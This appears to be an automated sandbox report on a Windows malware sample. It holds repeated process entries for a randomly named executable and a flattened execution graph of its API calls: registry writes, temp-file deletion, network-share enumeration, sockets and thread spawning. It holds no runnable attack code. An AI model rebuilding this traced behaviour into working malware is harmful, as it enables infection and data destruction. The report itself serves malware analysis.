                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                  Start time:03:38:56
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                  Start time:03:38:57
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                  Start time:03:38:58
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                  Start time:03:38:58
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                  Start time:03:38:58
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                  Start time:03:38:59
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                  Start time:03:38:59
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                  Start time:03:38:59
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe"
                                                                                                                                                                                                                                  Imagebase:0x380000
                                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:21.4%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                    Signature Coverage:19.6%
                                                                                                                                                                                                                                    Total number of Nodes:1812
                                                                                                                                                                                                                                    Total number of Limit Nodes:52
                                                                                                                                                                                                                                    execution_graph 8982 12858e9 8986 1285901 8982->8986 8983 1285c01 8984 1285bf4 RegCloseKey 8984->8983 8985 1285962 wsprintfA 8985->8986 8987 1285a01 RegSetValueExA 8985->8987 8986->8985 8986->8987 8988 1285935 8986->8988 8987->8986 8988->8983 8988->8984 8850 1285a6a 8851 1285a82 8850->8851 8854 1285ad0 wsprintfA RegQueryValueExA 8851->8854 8855 1285b37 8851->8855 8852 1285c01 8853 1285bf4 RegCloseKey 8853->8852 8854->8855 8855->8852 8855->8853 8776 128b22e 8777 128b366 8776->8777 8785 12844cb InterlockedExchange 8776->8785 8786 12844cb InterlockedExchange 8777->8786 8780 128b37b 8781 128b39c 8780->8781 8782 128b38d GetTickCount 8780->8782 8783 128c76b 2 API calls 8781->8783 8782->8781 8784 128b3b7 8783->8784 8785->8777 8786->8780 8896 12914a1 8897 12914ab 8896->8897 8898 12914bb Sleep 8897->8898 8899 12914b1 FindClose 8897->8899 8900 12914c8 8898->8900 8899->8898 8901 12924a1 8902 12924ab 8901->8902 8903 12924cb 8902->8903 8904 12924b4 CloseHandle 8902->8904 8905 12924e1 8903->8905 8906 12924d4 CloseHandle 8903->8906 8904->8903 8907 12924ea GetProcessHeap HeapFree 8905->8907 8908 1292500 8905->8908 8906->8905 8907->8908 8991 128d1e4 8992 128d1f4 8991->8992 8993 128d346 8992->8993 8994 128d20e 8992->8994 9004 12844cb InterlockedExchange 8992->9004 9005 12844cb InterlockedExchange 8994->9005 8997 128d273 8999 128c76b 2 API calls 8997->8999 9000 128d298 8997->9000 8998 128d232 8998->8997 9006 12844cb InterlockedExchange 8998->9006 8999->9000 9002 128b3ef InterlockedExchange 9000->9002 9003 128d336 9002->9003 9004->8994 9005->8998 9006->8997 7125 1294567 SetErrorMode WSAStartup RtlInitializeCriticalSection RtlInitializeCriticalSection RtlInitializeCriticalSection 7148 1293b60 7125->7148 7129 12945de CreateThread 7130 12841c6 3 API calls 7129->7130 7442 1289eea 7129->7442 7131 1294605 CreateThread 7130->7131 7132 12841c6 3 API calls 7131->7132 7416 129392d 7131->7416 7133 129462c CreateThread 7132->7133 7134 12841c6 3 API calls 7133->7134 7397 1288962 Sleep 7133->7397 7135 1294653 CreateThread 7134->7135 7136 12841c6 3 API calls 7135->7136 7379 128a2f5 7135->7379 7137 129467a CreateThread 7136->7137 7138 12841c6 3 API calls 7137->7138 7535 128426a 7137->7535 7139 12946a1 CreateThread 7138->7139 7140 12841c6 3 API calls 7139->7140 7521 1287a3a 7139->7521 7141 12946c8 CreateThread 7140->7141 7142 12841c6 3 API calls 7141->7142 7509 12883c9 socket 7141->7509 7143 12946ef CreateThread 7142->7143 7144 12841c6 3 API calls 7143->7144 7496 128878b Sleep 7143->7496 7145 1294716 7144->7145 7146 129472f 7145->7146 7147 1294722 Sleep 7145->7147 7147->7145 7149 1293b8a 7148->7149 7223 1292ebc RegOpenKeyExA 7149->7223 7152 1293c28 GetProcAddress GetProcAddress GetProcAddress 7153 1293c72 LoadLibraryA 7152->7153 7154 1293c8e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7153->7154 7155 1293cf1 RegOpenKeyExA 7153->7155 7154->7155 7156 1293d4d RegOpenKeyExA 7155->7156 7157 1293d15 RegSetValueExA RegCloseKey 7155->7157 7158 1293da9 lstrcpy lstrcat RegOpenKeyExA 7156->7158 7159 1293d71 RegSetValueExA RegCloseKey 7156->7159 7157->7156 7160 1293e5f RegOpenKeyExA 7158->7160 7161 1293df4 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 7158->7161 7159->7158 7162 1293f15 GetWindowsDirectoryA lstrlen 7160->7162 7163 1293e87 RegSetValueExA RegSetValueExA RegSetValueExA RegCloseKey 7160->7163 7161->7160 7164 1293f4c GetComputerNameA lstrlen 7162->7164 7165 1293f3c lstrcat 7162->7165 7163->7162 7166 1293fc9 lstrcpy GetUserNameA lstrlen 7164->7166 7167 1293f7c lstrlen 7164->7167 7165->7164 7168 1294009 lstrcpy 7166->7168 7171 129401d 7166->7171 7167->7166 7168->7171 7169 129404e lstrlen 7170 12940e1 7169->7170 7169->7171 7231 1290b9a lstrcpy GetTickCount lstrlen wsprintfA CreateFileA 7170->7231 7171->7169 7171->7170 7173 12940aa lstrlen 7171->7173 7173->7171 7175 129414d lstrcpy 7183 129414b 7175->7183 7176 12940f2 GetTempPathA lstrlen 7177 1294129 7176->7177 7178 1294119 lstrcat 7176->7178 7180 1290b9a 7 API calls 7177->7180 7178->7177 7179 1294178 lstrlen 7182 1294205 lstrcat CreateFileMappingA 7179->7182 7179->7183 7181 1294133 7180->7181 7181->7183 7184 129413a lstrcpy 7181->7184 7185 129423a 7182->7185 7183->7179 7183->7182 7186 12941db lstrlen 7183->7186 7184->7183 7234 1286274 CreateFileMappingA 7185->7234 7186->7183 7190 1294246 7191 1294331 7190->7191 7192 1294256 7190->7192 7193 1285760 10 API calls 7191->7193 7254 128c89a 7192->7254 7197 129432c 7193->7197 7195 129431e 7196 1285760 10 API calls 7195->7196 7196->7197 7260 1284d96 7197->7260 7198 129428e 7198->7195 7204 129429d 7198->7204 7200 129434a 7294 12855be CreateFileA 7200->7294 7204->7198 7311 1285e86 7204->7311 7205 1294361 7305 128a553 GetTickCount GetPrivateProfileStringA lstrlen 7205->7305 7206 1294366 7207 1294397 7206->7207 7212 12943c6 7206->7212 7317 12844cb InterlockedExchange 7207->7317 7210 129439c GetTickCount wsprintfA 7210->7212 7211 12944aa lstrcat GetSystemDirectoryA lstrlen 7213 12944f5 lstrcat lstrcat GlobalAlloc GlobalAlloc 7211->7213 7214 12944e5 lstrcat 7211->7214 7212->7211 7216 1294461 lstrlen wsprintfA 7212->7216 7215 1294556 CreateThread 7213->7215 7214->7213 7218 12841c6 RtlEnterCriticalSection 7215->7218 7487 12927d4 GlobalAlloc 7215->7487 7216->7212 7217 12944a3 7216->7217 7217->7211 7219 1284229 7218->7219 7222 12841e2 7218->7222 7220 128425b RtlLeaveCriticalSection 7219->7220 7221 128423c CloseHandle 7219->7221 7220->7129 7221->7220 7222->7220 7224 1292f0d RegSetValueExA RegCloseKey 7223->7224 7225 1292f44 7223->7225 7224->7225 7226 1292f8b lstrcpy lstrcat 7225->7226 7318 1292e32 RegOpenKeyExA 7225->7318 7228 1292fbe 7226->7228 7229 1292ffa LoadLibraryA 7228->7229 7230 1292e32 6 API calls 7228->7230 7229->7152 7229->7153 7230->7228 7232 1290c23 CloseHandle DeleteFileA 7231->7232 7233 1290c44 7231->7233 7232->7233 7233->7175 7233->7176 7235 12862d9 7234->7235 7236 12862bc MapViewOfFile 7234->7236 7237 1285760 7235->7237 7236->7235 7238 12857ec 7237->7238 7239 12857e3 7237->7239 7238->7190 7239->7238 7240 12857f1 lstrcpy RegOpenKeyExA 7239->7240 7241 1285854 7240->7241 7242 1285827 7240->7242 7244 128585e 7241->7244 7248 1285a4b 7241->7248 7242->7238 7243 1285832 RegCreateKeyA 7242->7243 7243->7238 7243->7241 7245 1285872 RegEnumValueA 7244->7245 7246 12858ab 7244->7246 7249 12858ad RegDeleteValueA 7244->7249 7245->7244 7245->7246 7251 1285935 7246->7251 7252 1285962 wsprintfA 7246->7252 7253 1285a01 RegSetValueExA 7246->7253 7247 1285bf4 RegCloseKey 7247->7238 7250 1285ad0 wsprintfA RegQueryValueExA 7248->7250 7248->7251 7249->7245 7250->7251 7251->7238 7251->7247 7252->7246 7252->7253 7253->7246 7255 128c906 7254->7255 7256 128c8b7 7254->7256 7255->7198 7256->7255 7257 128c8c0 MapViewOfFile 7256->7257 7257->7255 7258 128c8e0 7257->7258 7259 128c8f2 UnmapViewOfFile 7258->7259 7259->7255 7261 1284dc0 7260->7261 7262 1284e3c 7261->7262 7263 1284e41 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7261->7263 7262->7200 7264 1285112 7263->7264 7265 1284eb7 RegCreateKeyA 7263->7265 7267 128513a wsprintfA 7264->7267 7290 128529e 7264->7290 7265->7262 7266 1284ee0 GlobalAlloc 7265->7266 7268 128c89a 2 API calls 7266->7268 7269 12851a0 RegQueryValueExA 7267->7269 7270 1285165 RegQueryValueExA 7267->7270 7271 1284eff 7268->7271 7276 1285199 7269->7276 7270->7276 7273 1284f1a 7271->7273 7323 1286330 7271->7323 7272 1285433 RegCloseKey 7272->7262 7277 1284f52 wsprintfA 7273->7277 7278 1285085 RegCloseKey 7273->7278 7281 12850d2 7273->7281 7275 12850f9 GlobalFree 7275->7262 7276->7200 7279 1284f9c 7277->7279 7280 1284fa9 7277->7280 7278->7281 7279->7276 7279->7280 7284 1284fe5 7279->7284 7285 1285007 7279->7285 7282 1285030 RegSetValueExA 7280->7282 7283 1285053 lstrlen RegSetValueExA 7280->7283 7281->7262 7281->7275 7286 1285080 7282->7286 7283->7286 7347 1284a5b 7284->7347 7288 1284a5b 2 API calls 7285->7288 7286->7200 7289 1285016 lstrcpy 7288->7289 7289->7280 7292 1286330 32 API calls 7290->7292 7293 1285403 7290->7293 7292->7293 7293->7262 7293->7272 7295 128572b 7294->7295 7296 1285650 GetFileSize 7294->7296 7299 1285742 7295->7299 7301 1286330 32 API calls 7295->7301 7297 128571e CloseHandle 7296->7297 7298 1285672 7296->7298 7297->7295 7298->7297 7300 1285682 GlobalAlloc ReadFile lstrcpy lstrlen 7298->7300 7302 128575b lstrlen 7299->7302 7303 128574e GlobalFree 7299->7303 7304 12856f4 7300->7304 7301->7299 7302->7205 7302->7206 7303->7302 7304->7297 7306 128a660 lstrcpy 7305->7306 7307 128a5e0 GetTickCount 7305->7307 7306->7206 7308 128a5ff 7307->7308 7378 12844cb InterlockedExchange 7308->7378 7310 128a613 wsprintfA WritePrivateProfileStringA 7310->7306 7312 1285eb2 7311->7312 7315 1285ebb 7311->7315 7313 1285f2b GetTickCount 7312->7313 7314 1285f0f 7312->7314 7312->7315 7313->7314 7314->7315 7316 1286056 GetTickCount 7314->7316 7315->7204 7316->7315 7317->7210 7319 1292e5c RegSetValueExA RegCloseKey 7318->7319 7320 1292e80 RegCreateKeyA 7318->7320 7321 1292eb8 7319->7321 7320->7321 7322 1292e96 RegSetValueExA RegCloseKey 7320->7322 7321->7225 7322->7321 7351 1298060 7323->7351 7325 128633d RtlEnterCriticalSection 7326 128672a 7325->7326 7343 12863dd 7325->7343 7327 128695b RtlLeaveCriticalSection 7326->7327 7328 1286734 IsBadWritePtr 7326->7328 7329 128697c 7327->7329 7328->7327 7330 128674f 7328->7330 7329->7273 7330->7327 7331 128678e wsprintfA lstrlen 7330->7331 7332 12867ca 7331->7332 7332->7327 7333 1286868 GlobalFree 7332->7333 7334 1286875 GlobalAlloc 7332->7334 7333->7334 7335 12868a7 7334->7335 7336 12868bf GlobalAlloc wsprintfA lstrlen 7335->7336 7337 12868b3 GlobalFree 7335->7337 7339 1286914 7336->7339 7337->7336 7338 1286412 7373 12854a2 CreateFileA 7339->7373 7340 1286623 lstrcpy 7340->7343 7341 1286698 7346 12866a1 7341->7346 7353 1284af0 7341->7353 7343->7338 7343->7340 7343->7341 7346->7327 7350 1284a68 7347->7350 7348 1284ab2 lstrlen wsprintfA 7348->7350 7349 1284ae5 lstrcpy 7349->7280 7350->7348 7350->7349 7352 129806c 7351->7352 7352->7325 7352->7352 7354 1284afd 7353->7354 7355 1284b5b 7354->7355 7356 1284b60 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7354->7356 7355->7346 7357 1284bcb RegCreateKeyA 7356->7357 7358 1284bed 7356->7358 7357->7358 7359 1284be8 7357->7359 7360 1284d68 RegCloseKey 7358->7360 7361 1284c15 wsprintfA 7358->7361 7359->7355 7360->7355 7362 1284c60 7361->7362 7364 1284c6d 7361->7364 7363 1284cbc 7362->7363 7362->7364 7365 1284ce5 7362->7365 7369 1284a5b 2 API calls 7363->7369 7366 1284d13 RegSetValueExA 7364->7366 7367 1284d36 lstrlen RegSetValueExA 7364->7367 7370 1284a5b 2 API calls 7365->7370 7368 1284d63 7366->7368 7367->7368 7368->7346 7371 1284cd2 lstrcpy 7369->7371 7372 1284cf9 lstrcpy 7370->7372 7371->7364 7372->7364 7374 12855b9 7373->7374 7375 1285520 lstrcpy lstrlen 7373->7375 7374->7327 7376 1285561 7375->7376 7377 128557b WriteFile SetEndOfFile CloseHandle 7376->7377 7377->7374 7378->7310 7541 12844cb InterlockedExchange 7379->7541 7381 128a360 Sleep GetTempPathA lstrlen 7382 128a3b8 7381->7382 7383 128a3a6 lstrcat 7381->7383 7384 128a542 RtlExitUserThread 7382->7384 7385 128a3c5 lstrlen lstrcpy lstrcat 7382->7385 7386 128a411 FindFirstFileA 7382->7386 7388 128a532 Sleep 7382->7388 7389 128a525 FindClose 7382->7389 7383->7382 7385->7382 7386->7382 7387 128a43b FindNextFileA 7386->7387 7387->7382 7390 128a457 lstrcat lstrlen lstrlen 7387->7390 7388->7382 7389->7388 7391 128a49e lstrcmpiA 7390->7391 7393 128a4b9 7390->7393 7391->7393 7392 128a50c Sleep 7392->7387 7393->7392 7395 128a4e3 lstrcmpiA 7393->7395 7542 128a26e 7393->7542 7548 128a2ad SHFileOperation RemoveDirectoryA 7393->7548 7395->7392 7395->7393 8139 12844cb InterlockedExchange 7397->8139 7399 1288a1f Sleep 7405 1288a39 7399->7405 7400 1288db5 RtlExitUserThread 7402 1288bab Sleep 7402->7405 7403 1288d8d Sleep 7403->7405 7404 1288da5 Sleep 7404->7405 7405->7400 7405->7402 7405->7403 7405->7404 7406 1288cae lstrcpy 7405->7406 7407 1288b2a IsBadWritePtr 7405->7407 8140 128a75a GetTempPathA lstrlen 7405->8140 8150 1290945 lstrcpy 7405->8150 8167 12914d9 CreateFileA 7405->8167 7406->7405 7407->7405 7411 1288b48 7407->7411 7408 128a75a 10 API calls 7408->7411 7411->7408 8186 12845d2 DeleteFileA CreateFileA 7411->8186 8189 1284631 lstrcpy lstrlen 7411->8189 7414 1288b86 Sleep 7414->7405 7417 129393a 7416->7417 7418 129397e lstrcpy LoadLibraryA 7417->7418 7419 1293971 Sleep 7417->7419 7420 12939cf 7418->7420 7421 12939b7 GetProcAddress 7418->7421 7419->7417 7422 12939d8 FreeLibrary lstrcat LoadLibraryA 7420->7422 7423 1293a2c 7420->7423 7421->7420 7422->7423 7424 1293a14 GetProcAddress 7422->7424 8218 129377a 7423->8218 7424->7423 7426 1293a31 CreateThread 7427 12841c6 3 API calls 7426->7427 8356 1293062 7426->8356 7428 1293a55 CreateThread 7427->7428 7429 12841c6 3 API calls 7428->7429 8349 1291e9b Sleep 7428->8349 7430 1293a7c Sleep 7429->7430 7431 1293ab0 7430->7431 7432 1293ab9 CreateThread 7431->7432 7433 1293ae7 Sleep 7431->7433 7437 1293a96 Sleep 7431->7437 7434 12841c6 3 API calls 7432->7434 8342 1291ce3 7432->8342 8229 129174a Sleep wsprintfA RegOpenKeyExA 7433->8229 7434->7431 7437->7431 7438 129174a 56 API calls 7440 1293b09 7438->7440 7439 1293b0e Sleep 7439->7440 7440->7439 8238 129195d Sleep WNetOpenEnumA 7440->8238 7443 1289ef9 Sleep 7442->7443 7444 1289f06 Sleep 7442->7444 7445 1289f11 7443->7445 7444->7445 8478 1288f51 RegOpenKeyExA 7445->8478 7448 1288f51 7 API calls 7449 1289f43 LoadLibraryA 7448->7449 7450 128a149 RtlExitUserThread 7449->7450 7451 1289f60 GetProcAddress 7449->7451 7452 128a165 7450->7452 7453 1289f7e 7451->7453 7454 1289f83 GetProcAddress 7451->7454 7455 1289fa2 7454->7455 7456 1289fa7 GetProcAddress 7454->7456 7457 1289fcb GetProcAddress 7456->7457 7458 1289fc6 7456->7458 7459 1289fe9 7457->7459 7460 1289fee GetProcAddress 7457->7460 7461 128a00d 7460->7461 7462 128a012 GetProcAddress 7460->7462 7463 128a031 7462->7463 7464 128a036 GetProcAddress 7462->7464 7465 128a059 GetProcAddress 7464->7465 7466 128a054 7464->7466 7467 128a078 7465->7467 7468 128a07d 7465->7468 7467->7450 8489 12892f3 GetSystemDirectoryA lstrlen 7468->8489 7470 128a082 CreateThread 7471 12841c6 3 API calls 7470->7471 8523 128940a 7470->8523 7472 128a0a3 LoadLibraryA 7471->7472 7472->7450 7473 128a0c0 GetProcAddress 7472->7473 7473->7450 7474 128a0de 7473->7474 8493 128917d CreateFileA 7474->8493 7476 128a0e3 7477 128a110 7476->7477 7478 12845d2 4 API calls 7476->7478 7479 128917d 2 API calls 7477->7479 7480 128a0fd 7478->7480 7481 128a118 7479->7481 8496 1289243 7480->8496 7481->7450 8499 1289706 GetSystemDirectoryA lstrlen 7481->8499 7485 128a125 CreateThread 7486 12841c6 3 API calls 7485->7486 8518 1289ebe 7485->8518 7486->7467 7488 128c89a 2 API calls 7487->7488 7489 1292828 7488->7489 7490 1292845 GlobalFree 7489->7490 7491 1292885 RtlExitUserThread 7490->7491 7493 1292863 7490->7493 7493->7491 8562 1292514 CreateToolhelp32Snapshot 